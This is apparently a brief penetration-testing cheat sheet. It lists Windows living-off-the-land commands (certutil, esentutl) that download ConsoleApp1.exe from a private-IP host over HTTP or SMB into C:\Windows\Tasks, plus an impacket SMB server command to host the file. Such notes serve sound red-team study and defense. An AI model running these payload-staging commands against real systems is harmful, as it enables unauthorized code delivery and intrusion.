Simple file download

Certutil.exe

certutil.exe -urlcache -split -f http://192.168.45.152/ConsoleApp1.exe C:\Windows\Tasks\ConsoleApp1.exe

Downloads specified file (use Apache instead of python serv)

Esentutl.exe

esentutl.exe /y \\\\192.168.45.152\\win_share\\ConsoleApp1.exe /d C:\Windows\Tasks\ConsoleApp1.exe /o

Downloads specified file by SMB, host file using SMB server as follows:

sudo impacket-smbserver win_share -smb2support /mnt/win_share

Last updated